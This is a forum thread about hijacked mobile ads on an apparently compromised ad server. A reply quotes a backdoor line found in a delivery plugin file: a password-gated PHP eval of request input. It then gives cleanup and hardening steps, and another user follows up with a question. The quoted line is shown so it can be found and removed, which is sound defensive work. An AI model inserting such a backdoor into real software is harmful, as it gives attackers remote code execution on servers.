[Mobile ads have been hijacked]

On 1/9/2019 at 5:07 AM, tvvpmi said:

Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php

Problably it has been modified, adding a line like this at the end:

if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}

You have to remove it. 

Also you have to search in the "images folder", for some php script ... and remove it. Perhaps you can send it privately to @Ian vM

Clean the prepend code of your zones ...  via sql o through the revive backend. Search for iframes and javascript codes.

Disable PHP execution on image folder or move image folder to "another place" as they are static files and serve them throught another subdomain. You don't need PHP for them

So is the problem a compromised plug in? genericText.delivery.php

If I do everything you say will that basically prevent this from happening again?

I have the same issue that popped up and I just want to be sure its plugged.